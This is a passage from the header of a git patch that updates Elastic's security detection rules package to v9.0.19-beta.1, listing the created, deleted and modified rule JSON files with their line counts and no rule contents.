From c4196b0639256d7392c3354731771a2979bdb031 Mon Sep 17 00:00:00 2001 From: tradebot-elastic <178941316+tradebot-elastic@users.noreply.github.com> Date: Mon, 8 Dec 2025 19:22:06 +0000 Subject: [PATCH 1/2] [Security Rules] Update security rules package to v9.0.19-beta.1 --- .../security_detection_engine/changelog.yml | 5 + ...0678712-b2df-11ed-afe9-f661ea17fbcc_6.json | 2 +- ...6b315-b566-482f-866c-1d8e2477ba16_210.json | 2 +- ...cca13-8832-49ac-a01b-a396114809f6_210.json | 83 ++++++ ...24bd9-d23f-4ec1-8674-3cf1a21e130b_210.json | 2 +- ...5f85a-240f-11ed-b3d9-f661ea17fbce_109.json | 2 +- ...83383af-b9a4-42b7-a463-29c40efe7797_5.json | 168 +++++++++++ ...871a5d8-6b5f-4a12-a568-fd7bc05bd8db_3.json | 170 ++++++++++++ ...f3da5-b5ec-47d1-908b-6ebb74814289_216.json | 102 ------- ...b79f5c0-2c31-4fea-86cd-e62644278205_2.json | 88 ------ ...bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_2.json | 91 ++++++ ...c3c80de-08c2-11f0-bd11-f661ea17fbcc_5.json | 2 +- ...6487d-8069-4888-9ddd-61b52490cebc_211.json | 2 +- ...2d30a-5f3e-4b71-bc3d-4a0c4914b7e0_105.json | 211 ++++++++++++++ ...2157a-8e96-4a95-a6e3-5faae5081a74_210.json | 2 +- ...e524fa6-eed3-11ef-82b4-f661ea17fbce_6.json | 144 ++++++++++ ...c8877-8613-416d-a98a-96b6664ee73a_210.json | 121 ++++++++ ...f3a93-efc7-4df2-94d6-0d9438c310d1_207.json | 97 ------- ...719ee47-89b8-4407-9d55-6dff2629dd4c_5.json | 132 +++++++++ ...68559-b274-4948-ad0b-f8415bb31126_108.json | 120 ++++++++ ...85c782e-f86a-11ee-9d9f-f661ea17fbce_3.json | 107 ------- ...2657ba-ab0e-4901-89a2-911d611eee98_10.json | 220 +++++++++++++++ ...e8096-e2b0-4bd8-80c9-34a820813fff_212.json | 110 ++++++++ ...a3f2a4c-12d0-4b88-961a-2711ee295637_3.json | 111 ++++++++ ...8fa52-44a7-4dae-b058-f3333b91c8d7_209.json | 96 ------- ...5160d-f5a2-4624-b0ff-6a1dc55d2516_207.json | 94 ------- ...d306bf0-7bcf-4acd-83fd-042f5711acc9_1.json | 136 +++++++++ ...d4ca9c0-ff1e-11ee-91cc-f661ea17fbce_3.json | 98 ------- ...1bafdf0-cf17-11ed-bd57-f661ea17fbcc_9.json | 2 +- ...dc608-e558-43d9-b521-150772250bae_208.json | 92 ------- ...b01043-4f04-4d2f-882a-5a1d2e95751b_11.json | 121 ++++++++ ...68dba-ce29-497b-8e13-b4fde1db5a2d_415.json | 2 +- ...a6484-2663-46db-a532-ef734bf9a796_210.json | 2 +- ...7c15a-91f8-4c3d-8b9e-1f99cc030a51_210.json | 2 +- ...0c9c2-bcd7-4d6e-9eba-faf3891ba450_218.json | 133 --------- ...f5332-42ea-11f0-b09a-f661ea17fbcd_106.json | 143 ++++++++++ ...d6f5332-42ea-11f0-b09a-f661ea17fbcd_2.json | 81 ------ ...10e77-c144-4e69-afb7-344e7127abd0_211.json | 2 +- ...5bd2c-0baa-4df0-80ea-45e474b5ef93_102.json | 57 ---- ...2d3ad0e-6add-11ef-8c7b-f661ea17fbcc_8.json | 2 +- ...de828-8190-4cf5-8d7c-7575846f6fe0_209.json | 98 ------- ...86980-1fb1-4dff-b311-3be941549c8d_108.json | 123 +++++++++ ...6188365-f88f-4f70-8c1d-0b9554186b9c_5.json | 2 +- ...f9024-8a0c-46a5-aa08-ce147ac73a4e_207.json | 96 ------- ...896d4c0-6ad1-11ef-8c7b-f661ea17fbcc_8.json | 2 +- ...8f384e0-aef8-11ed-9a38-f661ea17fbcc_5.json | 2 +- ...93ef120-63d1-11ef-8e38-f661ea17fbce_7.json | 150 ++++++++++ ...e32e6-6104-46d9-a06e-da0f8b5795a0_108.json | 95 +++++++ ...db029b3-fbb7-4697-ad07-33cbfd5bd080_1.json | 176 ++++++++++++ ...02465-876f-4f04-b016-84ef48ce7e5d_209.json | 112 -------- ...e528511-7316-4a6e-83da-61b5f1c07fd4_1.json | 95 ------- ...0c34c8a-b0bc-43bc-83aa-d2b76bf129e1_1.json | 91 ++++++ ...0fe11c2-376e-11f0-9a82-f661ea17fbcd_1.json | 2 +- ...eee3d-947f-46d3-a14d-7036b962c266_112.json | 124 --------- ...c462c-1159-4fa8-b1b7-9b6296ab4f96_113.json | 109 -------- ...577ef08-61d1-4458-909f-25a4b10c87fe_6.json | 113 ++++++++ ...72b4944-d810-43cf-83dc-7d080ae1b8dd_1.json | 184 +++++++++++++ ...7595dea-452b-4d37-b82d-6dd691325139_2.json | 128 +++++++++ ...22836-4a16-4b35-beee-98f6c4ee9bf2_213.json | 129 --------- ...19484-9826-4083-9eba-1da74cd0eaf2_111.json | 2 +- ...6edfc-079d-4907-b43c-baffa243270d_112.json | 117 -------- ...834ca-f861-414c-8602-150d5505b777_101.json | 69 ----- ...e5f2e-2480-11ed-bea8-f661ea17fbce_109.json | 2 +- ...5dc8a-3e41-40d8-bc28-91af7ac6cf60_113.json | 123 --------- ...121ce-c7b6-474a-8237-68ff71672379_210.json | 2 +- ...116c0-d89d-4d7c-82c2-39e6845a78ef_207.json | 95 ------- ...fbdc5-db15-485e-bc24-f5707f820c4b_108.json | 111 ++++++++ ...997f7-ae73-447d-a12d-bff1e8f5f0a0_210.json | 105 +++++++ ...0d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_104.json | 87 ------ ...7e118c1-19eb-4c20-93a6-8a6c30a5b48b_1.json | 151 ++++++++++ ...90fc62d-7386-4c75-92b0-af4517018da1_1.json | 101 +++++++ ...0658c-2107-4afc-91af-e0e55b7f7184_210.json | 2 +- ...e0cbf-86cc-45aa-9ff7-ff27db27d3ed_208.json | 89 ------ ...f4c58-b381-452a-8976-f1b1c6aa0def_115.json | 124 --------- ...55388-a19c-47c7-8ec4-f41656c2fded_210.json | 141 ---------- ...61522-2545-11ed-ac47-f661ea17fbce_109.json | 2 +- ...52599-ddec-4e14-bad1-28aa42404388_210.json | 2 +- ...0c814fc-7d06-11f0-b326-f661ea17fbcd_1.json | 2 +- ...3adec-1df9-4104-9c75-b97d9f078b25_210.json | 2 +- ...29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_214.json | 98 ------- ...4f17c52-6c6e-479e-ba72-236f3df18f3d_7.json | 178 ++++++++++++ ...5f28c4d-cfc8-4847-9cca-f2fb1e319151_1.json | 167 +++++++++++ ...631a759-4559-4c33-a392-13f146c8bcc4_2.json | 117 ++++++++ ...3649-f908-4a5b-a1e0-54090a1d3a32_124.json} | 38 ++- ...b3b5a-35e5-42db-bd36-6c5b9b4b7313_115.json | 92 ------- ...239ea-c1bc-4467-a6d3-b9e2cc7f676d_210.json | 2 +- ...756ee27-9152-479b-9b73-54b5bbda301c_4.json | 102 +++++++ ...554fc-0777-47ce-8c9b-3d01f198d7f8_211.json | 2 +- ...94a6c-c7ba-4e82-b476-26a26877adf6_209.json | 2 +- ...7a5a5-a2fc-4a76-ba9f-26849de881b4_209.json | 112 -------- ...d737b-f90a-4fe5-bda6-a68fa460044e_105.json | 87 ------ ...1f15e-533c-4a60-8014-a3c3ab851a1b_110.json | 107 +++++++ ...d021a-0afb-461c-acbe-ffdb9574d3f3_210.json | 103 ------- ...ddb6c33-00ce-4acd-832a-24b251512023_6.json | 178 ++++++++++++ ...130a5-9be6-48e5-943a-9628bfc74b18_212.json | 92 ------- ...35062-b7fc-4af9-acea-5b1ead65c5a5_208.json | 2 +- ...fa3abe3-9cd8-41de-951b-51ed8f710523_2.json | 137 +++++++++ ...4e2a0-315d-4334-bb1a-441c593e16ab_210.json | 111 -------- ...1de53ea-ff3b-11ee-b572-f661ea17fbce_3.json | 102 ------- ...999d0-7ab2-44bf-b328-6e63367b9b29_210.json | 2 +- ...4f45152-9aee-11ef-b0a5-f661ea17fbcd_5.json | 163 +++++++++++ ...c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_114.json | 127 --------- ...a404b-75aa-4ffd-8be5-3334a5a544dd_208.json | 2 +- ...3d8d9-b476-451d-a9e0-7a5addd70670_212.json | 83 ++++++ ...97b31-480e-4e63-a7f4-ede42bf2c6de_214.json | 96 ------- ...afc6cc9-8800-4c7f-be6b-b688d2dea248_6.json | 190 ------------- ...da11a-60a2-412e-8aa7-011e1eb9ed47_207.json | 94 ------- ...a8e60-2df0-11ed-b814-f661ea17fbce_109.json | 2 +- ...f65f984-5642-4291-a0a0-2bbefce4c617_4.json | 133 +++++++++ ...f7a0ee1-7b6f-466a-85b4-110fb105f5e2_1.json | 131 +++++++++ ...fc95782-4bd1-11f0-9838-f661ea17fbcd_2.json | 2 +- ...5db49-c57c-4fc0-bd86-7ccd6d10a35a_108.json | 146 ++++++++++ ...b70d3-e2c3-455e-af1b-2626a5a1a276_212.json | 67 +++++ ...f45f8-f8c2-4e28-992e-5a0e8d98e0fe_110.json | 119 -------- ...383a8d0-008b-47a5-94e5-496629dc3590_2.json | 132 +++++++++ ...f249e-4348-47ba-9741-1202a09556ad_210.json | 139 ++++++++++ ...4755a05-78c8-4430-8681-89cd6c857d71_6.json | 155 +++++++++++ ...c1f19-68e8-43a6-9dce-340771fe1be3_215.json | 114 ++++++++ ...5e2d45e-a3df-4acf-83d3-21805f564ff4_5.json | 168 +++++++++++ ...cdf31-7fd3-41cf-a185-681237ea277b_207.json | 89 ------ ...616ec-41e5-4edc-ada2-ab13ab45de8a_207.json | 89 ------ ...71231-6626-4e1b-abb7-6e361a171fbb_209.json | 89 ------ ...71231-6626-4e1b-abb7-6e361a171fbb_212.json | 2 +- ...050506c-df6d-4bdf-bc82-fcad0ef1e8c1_1.json | 97 +++++++ ...5ece6-2689-4224-a0e0-b04881e1f8ad_210.json | 107 +++++++ ...29d0766-204b-11f0-9c1f-f661ea17fbcd_2.json | 2 +- ...6faf5-78ec-4e25-bea1-73bacc9b59d9_111.json | 92 ------- ...63c3e-4154-4fc6-9f86-b411e0987bbf_208.json | 2 +- ...47b6f-5728-4004-ba00-625083b3dcb0_208.json | 121 ++++++++ ...0add4-3392-11ed-bd01-f661ea17fbce_109.json | 2 +- ...ee7c8-5437-49ae-b2d6-2960883898e9_214.json | 151 ++++++++++ ...62a71ae-aac9-11ef-9348-f661ea17fbce_5.json | 142 ++++++++++ ...20e61-e591-4191-8a3b-2861a2b887cd_113.json | 99 +++++++ ...14185-2568-4561-ae81-f3e480e5e695_210.json | 2 +- ...729e7-0c52-4c4c-b71e-88103304a79f_208.json | 96 ------- ...797d2c8-8ec9-48e6-a022-350cdfbf2d5e_1.json | 72 +++++ ...80b70a0-c820-11ed-8799-f661ea17fbcc_7.json | 2 +- ...95807-5b09-4e37-8a54-5cae5dc932d7_210.json | 2 +- ...65691-5599-447a-bac9-b3f2df5f9a9d_111.json | 101 ------- ...edd1804-83c7-4e48-b97d-c776b4c97564_5.json | 173 ++++++++++++ ...efb3f79-b77b-466a-9fa0-3645d22d1e7f_6.json | 130 +++++++++ ...f432a8b-9588-4550-838e-1f77285580d3_7.json | 178 ++++++++++++ ...cb68e-7c93-48d1-93b2-2c39023308eb_113.json | 97 ------- ...29140-8de3-4445-9f87-908fb6d824f4_214.json | 117 ++++++++ ...1b2c3d4-e5f6-7890-abcd-ef1234567890_1.json | 100 +++++++ ...1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_2.json | 153 +++++++++++ ...95334-2499-11ed-9e1a-f661ea17fbce_110.json | 2 +- ...640ef5b-e1da-4b17-8391-468fdbd1b517_1.json | 156 +++++++++++ ...8b3e2f0-8c7d-11ef-b4c6-f661ea17fbcd_1.json | 209 ++++++++++++++ ...8f7e9d4-3b2c-4d5e-8f1a-6c9b0e2d4a7f_1.json | 109 ++++++++ ...9fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_210.json | 2 +- ...f82f5-8e77-4f8b-b3ce-10c0f6afbc73_208.json | 2 +- ...b8f074c-5565-4bc4-991c-d49770e19fc9_8.json | 195 +++++++++++++ ...06eae-d5ec-4b14-b4fd-e8ba8086f0e1_212.json | 113 ++++++++ ...c8bb9-2486-49a8-8779-45fb5f9a93ee_209.json | 2 +- ...f2807-2b3e-47d7-b282-f84acbbe14be_208.json | 2 +- ...d66db2e-1cc7-4a2c-8fa5-5f3895e44a18_4.json | 73 +++++ ...e3e9625-89ad-4fc3-a7bf-fced5e64f01b_1.json | 127 +++++++++ ...0c98cfb-0745-4513-b6f9-08dddb033490_6.json | 173 ++++++++++++ ...0bfb8-26b7-4e5e-924e-218144a3fa71_108.json | 107 +++++++ ...51150-658f-4a60-832f-a00d1e6c6745_210.json | 2 +- ...2c3d4e5-f6a7-8901-bcde-f123456789ab_1.json | 128 +++++++++ ...2c3d4e5-f6a7-8901-bcde-f23456789012_1.json | 106 +++++++ ...36c99af-b944-4509-a523-7e0fad275be1_6.json | 120 ++++++++ ...ab1d2-712f-4f01-a751-df3826969807_207.json | 114 -------- ...7cd12-dac4-11ec-9582-f661ea17fbcd_108.json | 88 ------ ...9c8d7e6-5a4f-3c2b-1d0e-9f8a7b6c5d4e_1.json | 106 +++++++ ...42eb2-583c-439f-b04d-1fdd7c1417cc_210.json | 114 ++++++++ ...1b212-b85c-41c6-9b28-be0e5cdfc9b1_210.json | 2 +- ...1a775-8267-41fa-9232-20e5582596ac_211.json | 2 +- ...f646b-08d4-492c-870a-6c04e3700034_211.json | 117 -------- ...073bf-ce26-4607-b405-ba1ed8e9e204_211.json | 120 ++++++++ ...0136397-f82a-45e5-9b9f-a3651d77e21a_1.json | 108 ++++++++ ...3d4e5f6-a7b8-9012-cdef-123456789abc_1.json | 128 +++++++++ ...595363f-52a6-49e1-9257-0e08ae043dbd_1.json | 166 +++++++++++ ...6b40f4c-c6a9-434e-adb8-989b0d06d005_2.json | 149 ++++++++++ ...70d9f0d-8cb6-4cfc-85df-a95c1ccf4eab_1.json | 93 ------- ...b5533-ca2a-41f6-a8b0-ee98abe0f573_109.json | 107 +++++++ ...9768e-40e1-4e45-a097-0e5fbc876ac2_210.json | 2 +- ...4500a-abd7-4ef3-b5d3-95524de7cfe1_210.json | 2 +- ...a8a20-2df2-11ed-8378-f661ea17fbce_109.json | 2 +- ...1bafa-9f01-4f43-a872-605b678968b0_219.json | 107 +++++++ ...49724-c577-4fd6-8f9b-d1b8ec519ec0_208.json | 2 +- ...1e5e410-3e34-412e-9b1f-dd500b3b55cd_2.json | 128 --------- ...1f310cb-5921-4d37-bbdf-cfdab7a6df9c_1.json | 135 +++++++++ ...ea3bf-9a11-463e-bd46-f648f2a0f4b1_109.json | 126 --------- ...43f2b43-02a1-4219-8ce9-10929a32a618_5.json | 178 ++++++++++++ ...488f026-7907-4f56-ad51-742feb3db01c_5.json | 108 ++++++++ ...4f0ae-3dd1-4856-9aad-ccfe4d4bfa17_209.json | 112 -------- ...eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_210.json | 2 +- ...3ff2a-203e-4a46-a3e3-40512cfe8fbb_210.json | 2 +- ...788313c-9e0b-4c5a-8c4b-c3f05a47d5a8_4.json | 124 +++++++++ ...c1cca-93ed-43c1-bbb6-c0dd3eff2958_210.json | 113 -------- ...9af2479-ad13-4471-a312-f586517f1243_3.json | 128 +++++++++ ...7eee1-129c-4661-a7aa-57d0b9645fad_112.json | 88 ------ ...28dee-c999-400f-b640-50a081cc0fd1_212.json | 67 +++++ ...e67f85e-2d43-11f0-b8c9-f661ea17fbcc_5.json | 2 +- ...f0553c8-2296-45ef-b4dc-3b88c4c130a7_1.json | 137 +++++++++ ...2c845-48d0-4f46-8a13-7d0aba05df82_210.json | 96 ------- ...c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_207.json | 101 ------- ...31051-ee01-4307-a6ee-b21b186958f4_209.json | 139 ---------- ...5105c-ba6d-481f-82bb-9b633e7b4827_208.json | 2 +- ...f87d0-a70e-4f8d-8443-a6407bc34643_308.json | 111 -------- ...d1fe9-b2f4-48d4-bace-a026dc745d4b_112.json | 106 +++++++ ...8c9ff14-fd1e-11ee-a0df-f661ea17fbce_7.json | 133 +++++++++ ...903ce9a-5ce6-4246-bb14-75ed3ec2edf5_8.json | 178 ++++++++++++ ...48a02-bc47-4043-8e94-2885b19b2636_213.json | 121 ++++++++ ...77d63-9679-4ce3-be25-3ba8b795e5fa_108.json | 127 +++++++++ ...79c62-4481-4d6e-9643-3ca499df7aaa_106.json | 92 +++++++ ...efb0c-604d-42fa-ac46-ed1cfbc38f78_210.json | 2 +- ...2b32c-e221-4bd4-aa3b-c7d59b3bc01d_207.json | 92 ------- ...300a7-7e31-4a72-a258-250abb8b3aa1_215.json | 139 ++++++++++ ...0cc239b-67fa-46fc-89d4-f861753a40f5_4.json | 2 +- ...1a6d0f4-95b8-11ed-9517-f661ea17fbcc_6.json | 2 +- ...2015527-7c46-4bb9-80db-051657ddfb69_6.json | 140 ++++++++++ ...f3443-4fbb-4c27-ab89-c3ad49d62315_207.json | 84 ------ ...3e68a4-bd19-11ed-b02f-f661ea17fbcc_11.json | 2 +- ...38633f4-3b31-4c80-b13d-e77c70ce8254_6.json | 158 +++++++++++ ...3ac6734-7e52-4a0d-90b7-6847bf4308f2_2.json | 260 ++++++++++++++++++ ...48ecc44-7d02-437d-9562-b838d2c41987_7.json | 128 +++++++++ ...4c678-3c33-43aa-b169-bb3d5198c41d_215.json | 100 ------- ...541ca3a-5752-11f0-b44b-f661ea17fbcd_1.json | 2 +- ...6652fb5-cd8e-499c-8311-2ce2bb6cac62_6.json | 111 ++++++++ ...6d8c743-0916-4483-8333-3c6f107e0caa_6.json | 173 ++++++++++++ ...2ec8a-e182-483c-91d2-72058f76a44c_209.json | 95 ------- ...22053-a5d2-46db-8c96-d460b12c36ac_106.json | 97 ------- ...92171ed-a4d3-4baa-98f9-4df1652cb11b_1.json | 128 +++++++++ ...504ac-1053-498f-aeaa-c6d01e76b379_207.json | 104 +++++++ ...9753455-8d55-4ad8-b70a-e07b6f18deea_5.json | 183 ++++++++++++ ...90abf-bd0c-45f9-8b5f-d0b74015e029_112.json | 108 -------- ...9abcddc-a05d-4345-a81d-000b79aa5525_7.json | 183 ++++++++++++ ...cd2e4be-6ec4-482f-9222-6245367cd738_2.json | 2 +- ...a992d-6130-4802-9ff8-829b89ae801f_317.json | 141 ++++++++++ ...e8d6507-b543-4bbc-849f-dc0da6db29f6_4.json | 108 ++++++++ ...dd44a-0ac6-44c4-8609-3f81bc820f02_210.json | 2 +- .../security_detection_engine/manifest.yml | 2 +- 236 files changed, 14074 insertions(+), 6805 deletions(-) create mode 100644 packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_210.json create mode 100644 packages/security_detection_engine/kibana/security_rule/083383af-b9a4-42b7-a463-29c40efe7797_5.json create mode 100644 packages/security_detection_engine/kibana/security_rule/0871a5d8-6b5f-4a12-a568-fd7bc05bd8db_3.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_216.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/0b79f5c0-2c31-4fea-86cd-e62644278205_2.json create mode 100644 packages/security_detection_engine/kibana/security_rule/0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_2.json create mode 100644 packages/security_detection_engine/kibana/security_rule/0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0_105.json create mode 100644 packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_6.json create mode 100644 packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_210.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_207.json create mode 100644 packages/security_detection_engine/kibana/security_rule/1719ee47-89b8-4407-9d55-6dff2629dd4c_5.json create mode 100644 packages/security_detection_engine/kibana/security_rule/17e68559-b274-4948-ad0b-f8415bb31126_108.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/185c782e-f86a-11ee-9d9f-f661ea17fbce_3.json create mode 100644 packages/security_detection_engine/kibana/security_rule/192657ba-ab0e-4901-89a2-911d611eee98_10.json create mode 100644 packages/security_detection_engine/kibana/security_rule/19de8096-e2b0-4bd8-80c9-34a820813fff_212.json create mode 100644 packages/security_detection_engine/kibana/security_rule/1a3f2a4c-12d0-4b88-961a-2711ee295637_3.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_209.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_207.json create mode 100644 packages/security_detection_engine/kibana/security_rule/1d306bf0-7bcf-4acd-83fd-042f5711acc9_1.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/1d4ca9c0-ff1e-11ee-91cc-f661ea17fbce_3.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_208.json create mode 100644 packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_11.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_218.json create mode 100644 packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_106.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_2.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_102.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_209.json create mode 100644 packages/security_detection_engine/kibana/security_rule/35f86980-1fb1-4dff-b311-3be941549c8d_108.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_207.json create mode 100644 packages/security_detection_engine/kibana/security_rule/393ef120-63d1-11ef-8e38-f661ea17fbce_7.json create mode 100644 packages/security_detection_engine/kibana/security_rule/3c7e32e6-6104-46d9-a06e-da0f8b5795a0_108.json create mode 100644 packages/security_detection_engine/kibana/security_rule/3db029b3-fbb7-4697-ad07-33cbfd5bd080_1.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_209.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/3e528511-7316-4a6e-83da-61b5f1c07fd4_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/40c34c8a-b0bc-43bc-83aa-d2b76bf129e1_1.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_112.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_113.json create mode 100644 packages/security_detection_engine/kibana/security_rule/4577ef08-61d1-4458-909f-25a4b10c87fe_6.json create mode 100644 packages/security_detection_engine/kibana/security_rule/472b4944-d810-43cf-83dc-7d080ae1b8dd_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/47595dea-452b-4d37-b82d-6dd691325139_2.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_213.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_112.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_101.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_113.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_207.json create mode 100644 packages/security_detection_engine/kibana/security_rule/52afbdc5-db15-485e-bc24-f5707f820c4b_108.json create mode 100644 packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_210.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_104.json create mode 100644 packages/security_detection_engine/kibana/security_rule/57e118c1-19eb-4c20-93a6-8a6c30a5b48b_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/590fc62d-7386-4c75-92b0-af4517018da1_1.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_208.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_115.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_210.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_214.json create mode 100644 packages/security_detection_engine/kibana/security_rule/64f17c52-6c6e-479e-ba72-236f3df18f3d_7.json create mode 100644 packages/security_detection_engine/kibana/security_rule/65f28c4d-cfc8-4847-9cca-f2fb1e319151_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/6631a759-4559-4c33-a392-13f146c8bcc4_2.json rename packages/security_detection_engine/kibana/security_rule/{66883649-f908-4a5b-a1e0-54090a1d3a32_120.json => 66883649-f908-4a5b-a1e0-54090a1d3a32_124.json} (56%) delete mode 100644 packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_115.json create mode 100644 packages/security_detection_engine/kibana/security_rule/6756ee27-9152-479b-9b73-54b5bbda301c_4.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_209.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/68ad737b-f90a-4fe5-bda6-a68fa460044e_105.json create mode 100644 packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_110.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_210.json create mode 100644 packages/security_detection_engine/kibana/security_rule/6ddb6c33-00ce-4acd-832a-24b251512023_6.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_212.json create mode 100644 packages/security_detection_engine/kibana/security_rule/6fa3abe3-9cd8-41de-951b-51ed8f710523_2.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_210.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/71de53ea-ff3b-11ee-b572-f661ea17fbce_3.json create mode 100644 packages/security_detection_engine/kibana/security_rule/74f45152-9aee-11ef-b0a5-f661ea17fbcd_5.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_114.json create mode 100644 packages/security_detection_engine/kibana/security_rule/78d3d8d9-b476-451d-a9e0-7a5addd70670_212.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_214.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/7afc6cc9-8800-4c7f-be6b-b688d2dea248_6.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_207.json create mode 100644 packages/security_detection_engine/kibana/security_rule/7f65f984-5642-4291-a0a0-2bbefce4c617_4.json create mode 100644 packages/security_detection_engine/kibana/security_rule/7f7a0ee1-7b6f-466a-85b4-110fb105f5e2_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/8025db49-c57c-4fc0-bd86-7ccd6d10a35a_108.json create mode 100644 packages/security_detection_engine/kibana/security_rule/809b70d3-e2c3-455e-af1b-2626a5a1a276_212.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_110.json create mode 100644 packages/security_detection_engine/kibana/security_rule/8383a8d0-008b-47a5-94e5-496629dc3590_2.json create mode 100644 packages/security_detection_engine/kibana/security_rule/83bf249e-4348-47ba-9741-1202a09556ad_210.json create mode 100644 packages/security_detection_engine/kibana/security_rule/84755a05-78c8-4430-8681-89cd6c857d71_6.json create mode 100644 packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_215.json create mode 100644 packages/security_detection_engine/kibana/security_rule/85e2d45e-a3df-4acf-83d3-21805f564ff4_5.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_207.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_207.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_209.json create mode 100644 packages/security_detection_engine/kibana/security_rule/9050506c-df6d-4bdf-bc82-fcad0ef1e8c1_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_210.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_111.json create mode 100644 packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_208.json create mode 100644 packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_214.json create mode 100644 packages/security_detection_engine/kibana/security_rule/962a71ae-aac9-11ef-9348-f661ea17fbce_5.json create mode 100644 packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_113.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_208.json create mode 100644 